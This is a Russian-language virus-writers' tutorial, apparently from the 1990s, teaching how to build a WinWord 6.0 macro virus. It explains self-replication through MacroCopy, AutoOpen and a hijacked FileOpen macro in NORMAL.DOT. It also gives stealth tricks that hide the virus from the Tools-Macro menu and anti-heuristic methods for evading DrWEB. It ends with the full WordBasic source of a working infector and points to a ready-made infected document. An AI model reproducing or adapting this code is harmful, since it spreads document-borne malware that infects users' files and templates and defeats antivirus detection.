
                               ВСТУПЛЕНИЕ

        Итак, новое направление в развитии вирусов: WinWord viruses!  До
 появления ANARCHY.6933 я обходил  это  направление своим вниманием,  но
 теперь охота мне повторить подвиг Яна Факовского и написать  что-нибудь
 подобное, но для начала просто первая попытка. Кстати, спасибо  ребятам
 из SGWW за журнал Infected Moscow #1. Там достаточно подробное описание
 MACRO - вирусов, но по моему пацаны не любят оптимизировать свои вирии.

                           ОСНОВНЫЕ ПОЛОЖЕНИЯ

        Написать MACRO - штучку оказалось  просто  как...,  нужно  всего
 лишь  немного  шарить  в BASIC'е и знать ГЛАВНУЮ  команду WordVirus'a -

                     MacroCopy Source, Destination

 которая  копирует  макрос  из  Source   в  Destination,  но   в  вирусе
 используется два варианта этой команды:
 MacroCopy FileName$()+":MacroName1","Normal:MacroName2"-копирует макрос
   из файла в NORMAL.DOT
 MacroCopy "Normal:MacroName1",FileName$()+":MacroName2"-копирует макрос
   из NORMAL.DOT в файл
 Кроме  того,  чтобы  ваш  вирус  успешно  существовал  в  среде  Word'a
 необходимо знать как собственно вирус запускается из файла: нужно всего
 лишь, чтобы  запускаемый  макрос  имел  имя в файле AutoOpen и все! При
 открытии  файла Word автоматически запустит это макрос! Заражение файла
 осуществляется   примерно   также,   важно  чтобы  в  файле  NORMAL.DOT
 присутствовал макрос FileOpen и при открытии  файла зараженным  Word'oм
 вы получите доступ к файлу.

                         ПЕРЕМЕННЫЕ И КОНСТАНТЫ

        dlg - массив  Word'а  используется  им  для  поддержки  макросов
 вызываемых другим макросом.
        FileName$() - имя открытого файла
        CountMacros - количество макросов
        MacroName$ - имя макроса
        Normal - имя  файла  в  котором хранятся  макросы (русский Word)
                 если  вы  хотите заражать аглицкий Word, замените везде
                 Normal на Global

                           СТЕЛС - ТЕХНОЛОГИИ

        Это  ваще  дребедень, проблема данного MACRO - вируса: его можно
 легко найти и уничтожить, используя меню Сервис-Макрос, так  вот  чтобы
 этого не  происходило  вместе с макросами вируса распространяйте макрос
  macros -= ToolsMacro =-

  Sub Main
  End Sub

 Это не ошибка! Распространяйте ПУСТОЙ макрос и все проблемы с простотой
 будут  решены!  Правда  есть  одно  НО.  Глупый юзер обломится со всеми
 остальными макросами !-(
 Более  сложный,  но  и более корректный способ: обрабатывать ToolsMacro
 самому.
                             АНТИ-ЭВРИСТИКА

        Как  сделать так, чтобы DrWEB и иже с ним не ловили ваши детища?
 Тут необходимо немного фантазии, но все же:
        1. DrWEB не обрабатыает, например, смену шрифта.
        2. Создаете макрос со случайным именем и записываете туда строку
           MacroCopy ... , ... но перед этим задаете шрифт какого-нибудь
           размера и записываете строку,  расшифровывая по маске шрифта,
           запускаете этот макрос и удаляете его! И все, все!

                               ПРИМЕЧАНИЯ

        Стартовые макросы могут быть AutoOpen, AutoClose, AutoSave.
        Глобальные макросы FileOpen, FileSaveAs, FileSave, FileClose.



Собственно текст макроса:

 macros -= CS =-

 Sub MAIN
  On Error Goto ops
  c = 0
  For i = 1 To CountMacros(0, 0)
   If MacroName$(i, 0, 0) = "CS" Then c = 10
  Next i
  If c = 10 Then Goto ops
  REM WinWord 6.0 Infector by CyberShadow...
  REM Thanks to SGWW !
  MacroCopy FileName$() + ":AutoOpen", "Normal:CS"
  MacroCopy FileName$() + ":CSF", "Normal:FileOpen"
 ops:
 End Sub


 macros -= FileOpen =-

 Sub MAIN
  Dim dlg As FileOpen
  On Error Goto ops
  GetCurValues dlg
  Dialog dlg
  FileOpen dlg
  s = 100
  For i = 1 To CountMacros(1, 0, 0)
   If MacroName$(i, 1) = "CSF" Then s = 1
  Next i
  If s = 1 Then Goto ops
  REM WinWord 6.0 Infector by CyberShadow...
  REM Thanks to SGWW !
  FileSaveAs FileName$(), .Format = 1
  MacroCopy "Normal:CS", FileName$() + ":AutoOpen"
  MacroCopy "Normal:FileOpen", FileName$() + ":CSF"
 ops:
 End Sub

P.S. Тем,кому ломы набирать текст макроса, посвящается файл CYBERS_V.DOC
     (русская версия)
